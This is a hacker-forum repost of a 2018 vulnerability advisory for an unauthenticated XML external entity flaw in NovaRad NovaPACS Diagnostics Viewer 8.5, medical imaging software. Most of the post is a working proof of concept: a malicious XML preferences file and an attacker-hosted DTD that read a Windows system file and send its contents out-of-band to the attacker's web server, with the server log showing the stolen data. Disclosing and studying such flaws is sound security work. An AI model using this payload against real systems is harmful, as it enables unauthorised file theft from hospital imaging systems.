跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Title: NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-09-07
# Vendor: NovaRad Corporation
# Product web page: https://www.novarad.net
# Affected version: 8.5.19.75 (Diagnostics Viewer, Study Browser)
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Advisory ID: ZSL-2018-5488
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php
# CVE: N/A

# Desc: NovaPACS suffers from an unauthenticated XML External Entity
# (XXE) injection vulnerability using the DTD parameter entities technique
# resulting in disclosure and retrieval of arbitrary data from the affected
# node via out-of-band (OOB) channel attack. The vulnerability is triggered
# when importing XML format preferences within the settings submenu.

# PoC
# Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://10.0.1.230:8080/xxe.xml">
%remote;
%root;
%oob;]>

# Attacker's xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://10.0.1.230:8080/?%payload;'> ">

Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /xxe.xml HTTP/1.1" 200 -
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1%0D%0A[MCI%20Extensions.BAK]%0D%0A3g2=MPEGVideo%0D%0A3gp=MPEGVideo%0D%0A3gp2=MPEGVideo%0D%0A3gpp=MPEGVideo%0D%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo%0D%0Amod=MPEGVideo%0D%0Amov=MPEGVideo%0D%0Amp4=MPEGVideo%0D%0Amp4v=MPEGVideo%0D%0Amts=MPEGVideo%0D%0Ats=MPEGVideo%0D%0Atts=MPEGVideo%0D%0A[FIX%20DMACS]%0D%0AMinAfterStartup=0 HTTP/1.1" 200 -

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。